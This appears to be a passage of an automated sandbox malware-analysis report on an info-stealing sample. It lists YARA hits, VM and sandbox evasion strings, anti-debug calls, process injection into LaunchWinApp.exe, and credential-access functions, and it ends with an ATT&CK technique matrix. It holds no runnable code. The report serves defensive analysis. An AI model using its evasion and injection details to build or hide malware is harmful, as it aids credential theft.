              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

              Malware Analysis System Evasion

              barindex
              Source: Yara matchFile source: 0.3.qpwx2wT5ky.exe.46615d0.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.qpwx2wT5ky.exe.31bbfc0.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.qpwx2wT5ky.exe.3170000.2.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.3.qpwx2wT5ky.exe.45615b0.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.3.qpwx2wT5ky.exe.4615610.3.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.qpwx2wT5ky.exe.3170000.2.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.3.qpwx2wT5ky.exe.4615610.3.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000000.00000003.301171439.0000000004615000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.317108118.0000000003170000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.301092646.000000000452D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: qpwx2wT5ky.exe PID: 6428, type: MEMORYSTR
              Source: qpwx2wT5ky.exe, 00000000.00000002.318536230.0000000004271000.00000004.00000800.00020000.00000000.sdmp, qpwx2wT5ky.exe, 00000000.00000003.301603484.0000000005962000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: WINE_GET_UNIX_FILE_NAME
              Source: qpwx2wT5ky.exe, 00000000.00000002.318536230.0000000004271000.00000004.00000800.00020000.00000000.sdmp, qpwx2wT5ky.exe, 00000000.00000003.301171439.0000000004615000.00000004.00000800.00020000.00000000.sdmp, qpwx2wT5ky.exe, 00000000.00000003.301092646.000000000452D000.00000004.00000800.00020000.00000000.sdmp, qpwx2wT5ky.exe, 00000000.00000003.301603484.0000000005962000.00000004.00000800.00020000.00000000.sdmp, qpwx2wT5ky.exe, 00000000.00000002.317216371.0000000003271000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SBIEDLL.DLL
              Source: qpwx2wT5ky.exe, 00000000.00000003.301171439.0000000004615000.00000004.00000800.00020000.00000000.sdmp, qpwx2wT5ky.exe, 00000000.00000003.301092646.000000000452D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: KERNEL32.DLL/WINE_GET_UNIX_FILE_NAMEQEMU
              Source: C:\Users\user\Desktop\qpwx2wT5ky.exe TID: 4972Thread sleep time: -922337203685477s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\LaunchWinApp.exe TID: 5452Thread sleep time: -90000s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\LaunchWinApp.exe TID: 5568Thread sleep time: -30000s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\qpwx2wT5ky.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\LaunchWinApp.exeAPI coverage: 4.3 %
              Source: C:\Users\user\Desktop\qpwx2wT5ky.exeProcess information queried: ProcessInformationJump to behavior
              Source: C:\Windows\SysWOW64\LaunchWinApp.exeCode function: 2_2_00437D4A __EH_prolog,_strftime,GetUserDefaultLCID,GetLocaleInfoA,GetUserNameA,GetComputerNameA,GetUserNameA,GetSystemInfo,GlobalMemoryStatusEx,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,EnumDisplayDevicesA,EnumDisplayDevicesA,EnumDisplayDevicesA,2_2_00437D4A
              Source: C:\Windows\SysWOW64\LaunchWinApp.exeCode function: 2_2_004604F2 FindFirstFileExW,2_2_004604F2
              Source: C:\Windows\SysWOW64\LaunchWinApp.exeCode function: 2_2_0043F85B FindClose,FindFirstFileExW,GetLastError,FindFirstFileExW,GetLastError,2_2_0043F85B
              Source: C:\Users\user\Desktop\qpwx2wT5ky.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\LaunchWinApp.exeCode function: 2_2_0043615F __EH_prolog,GetLogicalDriveStringsA,2_2_0043615F
              Source: Amcache.hve.16.drBinary or memory string: VMware
              Source: WerFault.exe, 00000010.00000003.500364191.00000000053B6000.00000004.00000800.00020000.00000000.sdmp, WerFault.exe, 00000010.00000003.500236208.00000000053B2000.00000004.00000800.00020000.00000000.sdmp, WerFault.exe, 00000010.00000003.500024980.00000000053B2000.00000004.00000800.00020000.00000000.sdmp, WerFault.exe, 00000010.00000002.503283976.00000000053B8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW6
              Source: Amcache.hve.16.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/5&1ec51bf7&0&000000
              Source: qpwx2wT5ky.exe, 00000000.00000003.301171439.0000000004615000.00000004.00000800.00020000.00000000.sdmp, qpwx2wT5ky.exe, 00000000.00000003.301092646.000000000452D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: WWW /c Microsoft-Hyper-V-Common-Drivers-Package
              Source: Amcache.hve.16.drBinary or memory string: VMware Virtual USB Mouse
              Source: Amcache.hve.16.drBinary or memory string: VMware, Inc.
              Source: qpwx2wT5ky.exe, 00000000.00000003.301603484.0000000005962000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
              Source: Amcache.hve.16.drBinary or memory string: VMware Virtual disk SCSI Disk Devicehbin
              Source: WerFault.exe, 00000010.00000002.503165059.00000000052F0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
              Source: qpwx2wT5ky.exe, 00000000.00000003.301603484.0000000005962000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMWARE
              Source: Amcache.hve.16.drBinary or memory string: VMware, Inc.me
              Source: qpwx2wT5ky.exe, 00000000.00000003.301603484.0000000005962000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware SVGA II
              Source: Amcache.hve.16.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/5&1ec51bf7&0&000000
              Source: qpwx2wT5ky.exe, 00000000.00000003.301092646.000000000452D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMwareVBoxARun using valid operating systemUSER
              Source: Amcache.hve.16.drBinary or memory string: @scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/5&280b647&0&000000
              Source: qpwx2wT5ky.exe, 00000000.00000003.301092646.000000000452D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMWAREESOFTWARE\VMware, Inc.\VMware Tools
              Source: qpwx2wT5ky.exe, 00000000.00000003.301603484.0000000005962000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: C:\WINDOWS\system32\drivers\vmmouse.sys
              Source: qpwx2wT5ky.exe, 00000000.00000003.301603484.0000000005962000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmware
              Source: qpwx2wT5ky.exe, 00000000.00000003.301603484.0000000005962000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: &C:\WINDOWS\system32\drivers\vmhgfs.sys
              Source: qpwx2wT5ky.exe, 00000000.00000003.301603484.0000000005962000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: C:\WINDOWS\system32\drivers\vmhgfs.sys
              Source: qpwx2wT5ky.exe, 00000000.00000003.301603484.0000000005962000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SOFTWARE\VMware, Inc.\VMware Tools
              Source: Amcache.hve.16.drBinary or memory string: Microsoft Hyper-V Generation Counter
              Source: Amcache.hve.16.drBinary or memory string: VMware7,1
              Source: Amcache.hve.16.drBinary or memory string: NECVMWar VMware SATA CD00
              Source: Amcache.hve.16.drBinary or memory string: VMware Virtual disk SCSI Disk Device
              Source: Amcache.hve.16.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW71.00V.13989454.B64.1906190538,BiosReleaseDate:06/19/2019,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware7,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
              Source: Amcache.hve.16.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
              Source: Amcache.hve.16.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
              Source: Amcache.hve.16.drBinary or memory string: VMware-42 35 d8 20 48 cb c7 ff-aa 5e d0 37 a0 49 53 d7
              Source: qpwx2wT5ky.exe, 00000000.00000003.301603484.0000000005962000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: %C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
              Source: qpwx2wT5ky.exe, 00000000.00000003.301603484.0000000005962000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: C:\WINDOWS\system32\drivers\VBoxMouse.sys
              Source: qpwx2wT5ky.exe, 00000000.00000003.301603484.0000000005962000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: )C:\WINDOWS\system32\drivers\VBoxMouse.sys
              Source: qpwx2wT5ky.exe, 00000000.00000003.301171439.0000000004615000.00000004.00000800.00020000.00000000.sdmp, qpwx2wT5ky.exe, 00000000.00000003.301092646.000000000452D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: kernel32.dll/wine_get_unix_file_nameQEMU
              Source: Amcache.hve.16.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/5&280b647&0&000000
              Source: qpwx2wT5ky.exe, 00000000.00000003.301092646.000000000452D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VIRTUALBOXUSOFTWARE\Oracle\VirtualBox Guest Additions!noValueButYesKeySC:\WINDOWS\system32\drivers\VBoxMouse.sys
              Source: qpwx2wT5ky.exe, 00000000.00000003.301092646.000000000452D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: InstallPathKC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\OC:\WINDOWS\system32\drivers\vmmouse.sysMC:\WINDOWS\system32\drivers\vmhgfs.sys
              Source: qpwx2wT5ky.exe, 00000000.00000003.301603484.0000000005962000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: "SOFTWARE\VMware, Inc.\VMware Tools
              Source: qpwx2wT5ky.exe, 00000000.00000003.301603484.0000000005962000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 'C:\WINDOWS\system32\drivers\vmmouse.sys
              Source: C:\Windows\SysWOW64\LaunchWinApp.exeCode function: 2_2_00446AC8 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_00446AC8
              Source: C:\Windows\SysWOW64\LaunchWinApp.exeCode function: 2_2_00434E00 LoadLibraryA,GetProcAddress,FreeLibrary,2_2_00434E00
              Source: C:\Windows\SysWOW64\LaunchWinApp.exeCode function: 2_2_0040D1A3 __EH_prolog,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,__EH_prolog,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,wsprintfA,CryptUnprotectData,CryptUnprotectData,2_2_0040D1A3
              Source: C:\Users\user\Desktop\qpwx2wT5ky.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Windows\SysWOW64\LaunchWinApp.exeCode function: 2_2_0045AAC7 mov eax, dword ptr fs:[00000030h]2_2_0045AAC7
              Source: C:\Windows\SysWOW64\LaunchWinApp.exeCode function: 2_2_0045AAF8 mov eax, dword ptr fs:[00000030h]2_2_0045AAF8
              Source: C:\Windows\SysWOW64\LaunchWinApp.exeCode function: 2_2_0045AA83 mov eax, dword ptr fs:[00000030h]2_2_0045AA83
              Source: C:\Windows\SysWOW64\LaunchWinApp.exeCode function: 2_2_00447699 mov eax, dword ptr fs:[00000030h]2_2_00447699
              Source: C:\Windows\SysWOW64\LaunchWinApp.exeProcess queried: DebugPortJump to behavior
              Source: C:\Users\user\Desktop\qpwx2wT5ky.exeMemory allocated: page read and write | page guardJump to behavior
              Source: C:\Windows\SysWOW64\LaunchWinApp.exeCode function: 2_2_00441435 SetUnhandledExceptionFilter,2_2_00441435
              Source: C:\Windows\SysWOW64\LaunchWinApp.exeCode function: 2_2_00446AC8 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_00446AC8
              Source: C:\Windows\SysWOW64\LaunchWinApp.exeCode function: 2_2_004412D2 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_004412D2
              Source: C:\Windows\SysWOW64\LaunchWinApp.exeCode function: 2_2_00441692 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_00441692

              HIPS / PFW / Operating System Protection Evasion

              barindex
              Source: C:\Users\user\Desktop\qpwx2wT5ky.exeMemory written: C:\Windows\SysWOW64\LaunchWinApp.exe base: 400000Jump to behavior
              Source: C:\Users\user\Desktop\qpwx2wT5ky.exeMemory written: C:\Windows\SysWOW64\LaunchWinApp.exe base: 401000Jump to behavior
              Source: C:\Users\user\Desktop\qpwx2wT5ky.exeMemory written: C:\Windows\SysWOW64\LaunchWinApp.exe base: 46E000Jump to behavior
              Source: C:\Users\user\Desktop\qpwx2wT5ky.exeMemory written: C:\Windows\SysWOW64\LaunchWinApp.exe base: 488000Jump to behavior
              Source: C:\Users\user\Desktop\qpwx2wT5ky.exeMemory written: C:\Windows\SysWOW64\LaunchWinApp.exe base: 48E000Jump to behavior
              Source: C:\Users\user\Desktop\qpwx2wT5ky.exeMemory written: C:\Windows\SysWOW64\LaunchWinApp.exe base: 48F000Jump to behavior
              Source: C:\Users\user\Desktop\qpwx2wT5ky.exeMemory written: C:\Windows\SysWOW64\LaunchWinApp.exe base: 2BD0008Jump to behavior
              Source: qpwx2wT5ky.exe, OuCPJ4q0f2/d4eQdQGngr.csReference to suspicious API methods: ('fhrGuUGcd4', 'GetProcAddress@kernel32.dll'), ('aiIB2IyVDl', 'VirtualProtect@kernel32.dll'), ('MhNAKwwAxy', 'LoadLibrary@kernel32.dll')
              Source: C:\Users\user\Desktop\qpwx2wT5ky.exeMemory allocated: C:\Windows\SysWOW64\LaunchWinApp.exe base: 400000 protect: page execute and read and writeJump to behavior
              Source: C:\Users\user\Desktop\qpwx2wT5ky.exeMemory written: C:\Windows\SysWOW64\LaunchWinApp.exe base: 400000 value starts with: 4D5AJump to behavior
              Source: C:\Users\user\Desktop\qpwx2wT5ky.exeProcess created: C:\Windows\SysWOW64\LaunchWinApp.exe C:\Windows\SysWOW64\LaunchWinApp.exeJump to behavior
              Source: C:\Users\user\Desktop\qpwx2wT5ky.exeQueries volume information: C:\Users\user\Desktop\qpwx2wT5ky.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\qpwx2wT5ky.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\qpwx2wT5ky.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\LaunchWinApp.exeCode function: __EH_prolog,CoInitialize,GetUserDefaultLCID,GetLocaleInfoA,Sleep,Sleep,GetUserNameA,Sleep,_strlen,_strlen,StrToIntA,CreateThread,CreateThread,CreateThread,CreateThread,CreateThread,CreateThread,CreateThread,CreateThread,CreateThread,StrToIntA,CreateThread,CreateThread,WaitForSingleObject,CreateThread,CreateThread,CreateThread,CreateThread,CreateThread,WaitForSingleObject,WaitForSingleObject,WaitForSingleObject,WaitForSingleObject,WaitForSingleObject,WaitForSingleObject,WaitForSingleObject,WaitForSingleObject,WaitForSingleObject,WaitForSingleObject,CreateThread,CreateThread,GetModuleHandleA,FreeLibrary,WaitForSingleObject,lstrlenA,GetEnvironmentVariableA,ShellExecuteA,ShellExecuteA,CoUninitialize,2_2_0042B39F
              Source: C:\Windows\SysWOW64\LaunchWinApp.exeCode function: EnumSystemLocalesW,2_2_004586D2
              Source: C:\Windows\SysWOW64\LaunchWinApp.exeCode function: GetLocaleInfoW,2_2_00458CFF
              Source: C:\Windows\SysWOW64\LaunchWinApp.exeCode function: GetACP,IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,2_2_00462E64
              Source: C:\Windows\SysWOW64\LaunchWinApp.exeCode function: EnumSystemLocalesW,2_2_00463151
              Source: C:\Windows\SysWOW64\LaunchWinApp.exeCode function: EnumSystemLocalesW,2_2_00463106
              Source: C:\Windows\SysWOW64\LaunchWinApp.exeCode function: EnumSystemLocalesW,2_2_004631EC
              Source: C:\Windows\SysWOW64\LaunchWinApp.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,2_2_00463277
              Source: C:\Windows\SysWOW64\LaunchWinApp.exeCode function: GetLocaleInfoW,2_2_004634CA
              Source: C:\Windows\SysWOW64\LaunchWinApp.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,2_2_004635F0
              Source: C:\Windows\SysWOW64\LaunchWinApp.exeCode function: GetLocaleInfoW,2_2_004636F6
              Source: C:\Windows\SysWOW64\LaunchWinApp.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,2_2_004637C5
              Source: C:\Windows\SysWOW64\LaunchWinApp.exeCode function: __EH_prolog,_strftime,GetUserDefaultLCID,GetLocaleInfoA,GetUserNameA,GetComputerNameA,GetUserNameA,GetSystemInfo,GlobalMemoryStatusEx,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,EnumDisplayDevicesA,EnumDisplayDevicesA,EnumDisplayDevicesA,2_2_00437D4A
              Source: C:\Windows\SysWOW64\LaunchWinApp.exeCode function: 2_2_004410F5 cpuid 2_2_004410F5
              Source: C:\Windows\SysWOW64\LaunchWinApp.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
              Source: C:\Windows\SysWOW64\LaunchWinApp.exeCode function: 2_2_004525EA GetSystemTimeAsFileTime,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,2_2_004525EA
              Source: C:\Windows\SysWOW64\LaunchWinApp.exeCode function: 2_2_0043771D __EH_prolog,GetTimeZoneInformation,std::ios_base::_Ios_base_dtor,2_2_0043771D
              Source: C:\Windows\SysWOW64\LaunchWinApp.exeCode function: 2_2_00429260 GetVersionExW,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,StrStrIW,lstrlenW,lstrlenW,FreeLibrary,2_2_00429260
              Source: C:\Windows\SysWOW64\LaunchWinApp.exeCode function: 2_2_00436235 GetUserNameA,2_2_00436235
              Source: Amcache.hve.LOG1.16.dr, Amcache.hve.16.drBinary or memory string: c:\users\user\desktop\procexp.exe
              Source: Amcache.hve.16.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
              Source: Amcache.hve.LOG1.16.dr, Amcache.hve.16.drBinary or memory string: procexp.exe

              Stealing of Sensitive Information

              barindex
              Source: Yara matchFile source: 2.2.LaunchWinApp.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.0.LaunchWinApp.exe.400000.6.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.0.LaunchWinApp.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.0.LaunchWinApp.exe.400000.7.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.0.LaunchWinApp.exe.400000.8.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.qpwx2wT5ky.exe.468cf00.3.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.0.LaunchWinApp.exe.400000.3.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.2.LaunchWinApp.exe.400000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.0.LaunchWinApp.exe.400000.3.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.0.LaunchWinApp.exe.400000.5.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.0.LaunchWinApp.exe.400000.4.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.0.LaunchWinApp.exe.400000.8.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.0.LaunchWinApp.exe.400000.2.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.0.LaunchWinApp.exe.400000.6.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.0.LaunchWinApp.exe.400000.4.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.qpwx2wT5ky.exe.468cf00.3.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.0.LaunchWinApp.exe.400000.2.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.0.LaunchWinApp.exe.400000.7.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.0.LaunchWinApp.exe.400000.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.0.LaunchWinApp.exe.400000.5.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000000.00000002.318536230.0000000004271000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000000.308435428.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000002.503612673.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000000.308711684.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000000.309062654.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000000.308140277.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.320185486.000000000468C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000000.467738406.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000000.309415722.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000000.467293779.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: qpwx2wT5ky.exe PID: 6428, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: LaunchWinApp.exe PID: 5980, type: MEMORYSTR
              Source: C:\Windows\SysWOW64\LaunchWinApp.exeCode function: Software\Microsoft\Internet Explorer\IntelliForms\Storage22_2_00435D8C

              Remote Access Functionality

              barindex
              Source: Yara matchFile source: 2.2.LaunchWinApp.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.0.LaunchWinApp.exe.400000.6.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.0.LaunchWinApp.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.0.LaunchWinApp.exe.400000.7.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.0.LaunchWinApp.exe.400000.8.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.qpwx2wT5ky.exe.468cf00.3.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.0.LaunchWinApp.exe.400000.3.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.2.LaunchWinApp.exe.400000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.0.LaunchWinApp.exe.400000.3.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.0.LaunchWinApp.exe.400000.5.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.0.LaunchWinApp.exe.400000.4.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.0.LaunchWinApp.exe.400000.8.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.0.LaunchWinApp.exe.400000.2.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.0.LaunchWinApp.exe.400000.6.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.0.LaunchWinApp.exe.400000.4.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.qpwx2wT5ky.exe.468cf00.3.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.0.LaunchWinApp.exe.400000.2.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.0.LaunchWinApp.exe.400000.7.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.0.LaunchWinApp.exe.400000.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.0.LaunchWinApp.exe.400000.5.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000000.00000002.318536230.0000000004271000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000000.308435428.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000002.503612673.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000000.308711684.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000000.309062654.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000000.308140277.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.320185486.000000000468C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000000.467738406.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000000.309415722.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000000.467293779.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: qpwx2wT5ky.exe PID: 6428, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: LaunchWinApp.exe PID: 5980, type: MEMORYSTR
              Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
              Valid Accounts11
              Native API
              Path Interception311
              Process Injection
              1
              Disable or Modify Tools
              1
              OS Credential Dumping
              2
              System Time Discovery
              Remote Services1
              Archive Collected Data
              Exfiltration Over Other Network Medium3
              Ingress Tool Transfer
              Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
              Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization Scripts1
              Deobfuscate/Decode Files or Information
              1
              Credentials In Files
              1
              Account Discovery
              Remote Desktop Protocol1
              Screen Capture
              Exfiltration Over Bluetooth2
              Encrypted Channel
              Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
              Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)3
              Obfuscated Files or Information
              Security Account Manager2
              File and Directory Discovery
              SMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration3
              Non-Application Layer Protocol
              Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
              Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)2
              Software Packing
              NTDS35
              System Information Discovery
              Distributed Component Object ModelInput CaptureScheduled Transfer13
              Application Layer Protocol
              SIM Card SwapCarrier Billing Fraud
              Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script11
              Masquerading
              LSA Secrets141
              Security Software Discovery
              SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
              Replication Through Removable MediaLaunchdRc.commonRc.common31
              Virtualization/Sandbox Evasion
              Cached Domain Credentials31
              Virtualization/Sandbox Evasion
              VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
